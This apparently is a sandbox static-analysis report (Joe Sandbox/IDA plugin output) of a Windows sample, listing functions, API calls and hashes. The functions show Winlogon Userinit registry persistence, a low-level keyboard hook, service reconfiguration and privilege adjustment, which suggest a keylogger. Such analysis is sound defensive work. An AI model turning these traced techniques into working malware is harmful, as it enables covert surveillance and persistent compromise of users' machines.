                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V?$basic_string@$D@1@@$DriveV10@V10@0@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@?find@?$basic_string@?resize@?$basic_string@LogicalStringsTypeV01@_itoalstrlen
                                                • String ID:
                                                • API String ID: 2656034736-0
                                                • Opcode ID: c5a30c28f081b53d22712db1f35a8f3ad6d8e5914f878b8807aa6eaa511786cd
                                                • Instruction ID: cec02d61d978296592b09cac4e61c212ec31f5845d3c6e7b9dfb66180788be86
                                                • Opcode Fuzzy Hash: c5a30c28f081b53d22712db1f35a8f3ad6d8e5914f878b8807aa6eaa511786cd
                                                • Instruction Fuzzy Hash: 8C21FF71900119ABCF14EBA1DD59EEE7778FB14706F00416AF106A2091DB789749CF69
                                                Function 00411F9F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 00411FDC
                                                  • Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                  • Part of subcall function 0040AA65: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                  • Part of subcall function 0040AA65: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                  • Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                  • Part of subcall function 0040AA65: RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                  • Part of subcall function 0040AA65: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413980,?,00000001), ref: 00412020
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00414D10,?,00000001), ref: 0041205B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004135D4,?,00000001), ref: 00412096
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 004120D8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?), ref: 00412103
                                                • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                • API String ID: 3561681748-3576401099
                                                • Opcode ID: d15b552b0ff96c2e3ef3e3d67bb2551a8713380eee93f4aaef4a43ae2b9f4088
                                                • Instruction ID: 8b8d483cb975bd7c8b4f59007ff54bd2d8bfc25679939a196059c40ca2960ee2
                                                • Opcode Fuzzy Hash: d15b552b0ff96c2e3ef3e3d67bb2551a8713380eee93f4aaef4a43ae2b9f4088
                                                • Instruction Fuzzy Hash: 8441B371B402447BEF10B6A59D47FEE7A29D784B01F2440AAFD00A72C1D6A94B9487EF
                                                Function 00410C16 Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00419288,?,?,004102C8), ref: 00410C22
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,004102C8), ref: 00410C2F
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,004102C8), ref: 00410C37
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C44
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004102C8), ref: 00410C75
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C87
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C8A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004102C8), ref: 00410C8F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                                • String ID:
                                                • API String ID: 760094045-0
                                                • Opcode ID: 896137ecff22d8b733aee0b2001e32bf22ef65779910e7bd50aa1f8dd93b730b
                                                • Instruction ID: b905c81bb435b8b08ff8893919c5d8bc3af143f33ace95a5df3eda7690bc98c4
                                                • Opcode Fuzzy Hash: 896137ecff22d8b733aee0b2001e32bf22ef65779910e7bd50aa1f8dd93b730b
                                                • Instruction Fuzzy Hash: 1E01B5711441287EE6245F24AC8DEFB3E9CEB05372F104326F562922D4EAA44EC189E9
                                                Function 004109EF Relevance: 12.0, APIs: 8, Instructions: 42serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00419288,?,?,004105FC), ref: 004109FB
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,004105FC), ref: 00410A08
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,004105FC), ref: 00410A10
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004105FC), ref: 00410A1D
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,004105FC), ref: 00410A28
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004105FC), ref: 00410A3A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004105FC), ref: 00410A3D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004105FC), ref: 00410A42
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                                • String ID:
                                                • API String ID: 3595611540-0
                                                • Opcode ID: 56d2056f5bdd1eeb955607b5ac70afe04ab9bfe9c70f89a70381f090165afb6e
                                                • Instruction ID: 510facd3668c7bf20710016c10a36eeb679cfddf894c6ad20c64923cde8d7e83
                                                • Opcode Fuzzy Hash: 56d2056f5bdd1eeb955607b5ac70afe04ab9bfe9c70f89a70381f090165afb6e
                                                • Instruction Fuzzy Hash: B3F096711002287FD310AF74AC88EFF3FACEF492A67004035F54683154DB745E419AA9
                                                Function 0040E7DF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040E7EC
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040E7F3
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040E805
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040E824
                                                • GetLastError.KERNEL32 ref: 0040E82A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 3534403312-3733053543
                                                • Opcode ID: def6256831d5847bd4d82568696012a8f3b809a28ee4d41b66c3a5e2a3bc5846
                                                • Instruction ID: 2fbdfd1633e78bfdff91efd60dbd587e0571d9bf435aa96d0aa0dc2af2570fac
                                                • Opcode Fuzzy Hash: def6256831d5847bd4d82568696012a8f3b809a28ee4d41b66c3a5e2a3bc5846
                                                • Instruction Fuzzy Hash: 78F017B1841129BBDB109FA4DC0DEEF7EACEF09346F104020B506E1058D6709B04CBA5
                                                Function 0040937B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409389
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 00409394
                                                • LockResource.KERNEL32(00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 0040939B
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 004093A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID: SETTINGS
                                                • API String ID: 3473537107-594951305
                                                • Opcode ID: 737ec9e2198e06504fd06a266f0158e6e1d183d0d61edb8b67e886450d5fa4dd
                                                • Instruction ID: 07cbcd12a54a6b67beaae60ad80ce7deea8c4263d55decee55ac0f9cd3ab5bff
                                                • Opcode Fuzzy Hash: 737ec9e2198e06504fd06a266f0158e6e1d183d0d61edb8b67e886450d5fa4dd
                                                • Instruction Fuzzy Hash: C0E0BF31641314B7D6105FA5AC0DFD67EA8EB8AF67F0040A5F609971D4C5754501C6A9
                                                Function 00404643 Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowsHookExA.USER32(0000000D,00404628,00000000,00000000), ref: 00404662
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404675
                                                • TranslateMessage.USER32(?), ref: 00404683
                                                • DispatchMessageA.USER32(?), ref: 0040468D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$DispatchHookTranslateWindows
                                                • String ID:
                                                • API String ID: 1978648212-0
                                                • Opcode ID: 341cf3b028638e3b1a546a5b1252c3d72e222849a4c6be8ccf96663d124796d0
                                                • Instruction ID: 4cd8b305e0da813772aec68583d1d63533f4a2342e85b929db5e86862b694621
                                                • Opcode Fuzzy Hash: 341cf3b028638e3b1a546a5b1252c3d72e222849a4c6be8ccf96663d124796d0
                                                • Instruction Fuzzy Hash: F6F030B2900205ABCB216FB69D0CD9BBAFCEBD6B02B10493AF545E2194F679C541C768
                                                Function 0040469B Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyState.USER32(00000014), ref: 004046EF
                                                • GetKeyState.USER32(00000014), ref: 004046F8
                                                  • Part of subcall function 00405E09: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413BA4,?), ref: 00405E89
                                                • CallNextHookEx.USER32(?,00000000,?,?), ref: 0040473B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                                • String ID:
                                                • API String ID: 98962008-0
                                                • Opcode ID: fa411fc1fe71c20f72ddbd772969b67c47a1eda3438ef8c3babd2298f57bd1bb
                                                • Instruction ID: b41be4409a5ee48be4a62fd8abeb9a86d681804794a4f204e27c4e5540bebde6
                                                • Opcode Fuzzy Hash: fa411fc1fe71c20f72ddbd772969b67c47a1eda3438ef8c3babd2298f57bd1bb
                                                • Instruction Fuzzy Hash: 0611EFB22002498BDF04AF75DC907AF3A01AB86304F44143FFA022B2C7CB7C88159B9D
                                                Function 00401102 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: hXMV$hXMV
                                                • API String ID: 0-400149659
                                                • Opcode ID: 69a08d5a59ab442faeb0d6c3e5eb8ce1b4f31785523e65d5647d420553a615a2
                                                • Instruction ID: 926b6984aa507745523806bda2f731cca1c3a495343a670e325394b4b3d9c0a4
                                                • Opcode Fuzzy Hash: 69a08d5a59ab442faeb0d6c3e5eb8ce1b4f31785523e65d5647d420553a615a2
                                                • Instruction Fuzzy Hash: E3F0F676E08785ABD7048B49DD52BAFFFB8E745B20F30462AE021636C0C27919018AA0
                                                Function 004044C3 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardLayout.USER32(00000000), ref: 004044C8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLayout
                                                • String ID:
                                                • API String ID: 194098044-0
                                                • Opcode ID: 92df64862e0399f095fe3136b64df33a7df8f5764fe28625e25afe133ee355aa
                                                • Instruction ID: 8a961c64fc0d533677a6add63cef3dd5ea5ec253bc5db06cec8c561a27389ce6
                                                • Opcode Fuzzy Hash: 92df64862e0399f095fe3136b64df33a7df8f5764fe28625e25afe133ee355aa
                                                • Instruction Fuzzy Hash: 1ED0A77B9483201FFB74BB19B9427E52680EB90731F96803BE6811BAD4D4E46AC24268
                                                Function 00411005 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                Function 00407AD4 Relevance: 150.8, APIs: 65, Strings: 21, Instructions: 338registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 384 407ad4-407aec call 40a109 387 407af8-407aff 384->387 388 407aee-407af3 call 406079 384->388 390 407b01 call 4100c6 387->390 391 407b06-407b0d 387->391 388->387 390->391 393 407b21-407b32 391->393 394 407b0f-407b20 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 41178f 391->394 395 407b34-407b48 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40ad45 393->395 396 407b4b-407b57 393->396 394->393 395->396 400 407b59-407b69 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40ad45 396->400 401 407b6c-407b78 396->401 400->401 404 407b7a-407b9c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 40aa65 401->404 405 407b9f-407ba6 401->405 404->405 408 407ba8-407bca ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 40aa65 405->408 409 407bcd-407bd4 405->409 408->409 410 407bd6-407bea ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40ad45 409->410 411 407bed-407c34 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 40a9ef 409->411 410->411 419 407c36-407c46 GetModuleFileNameW 411->419 420 407c48-407c52 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ RegDeleteKeyA 411->420 421 407c58-407c72 SetFileAttributesW 419->421 420->421 422 407c74 421->422 423 407c77-407c8d ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z 421->423 422->423 424 407ca2-407d08 _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 423->424 425 407c8f-407ca0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ SetFileAttributesW 423->425 426 407d67-407dc9 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z * 2 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 3 424->426 427 407d0a-407d61 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 3 424->427 425->424 428 407dd9-407de5 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z 426->428 429 407dcb-407dd3 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 426->429 427->426 430 407e23-407eea ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z * 2 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z * 2 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 5 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 4118f7 428->430 431 407de7-407e1d ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 428->431 429->428 434 407f11-407f30 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 3 430->434 435 407eec-407f08 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ShellExecuteW 430->435 431->430 435->434 436 407f0a-407f0b exit 435->436 436->434
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407B14
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407B36
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407B5B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00000000,004137F0,6C9BB310), ref: 00407B8A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00000000,004137F0,6C9BB310), ref: 00407BB8
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407BD8
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407BF4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BFD
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000208,00000000), ref: 00407C1D
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407C40
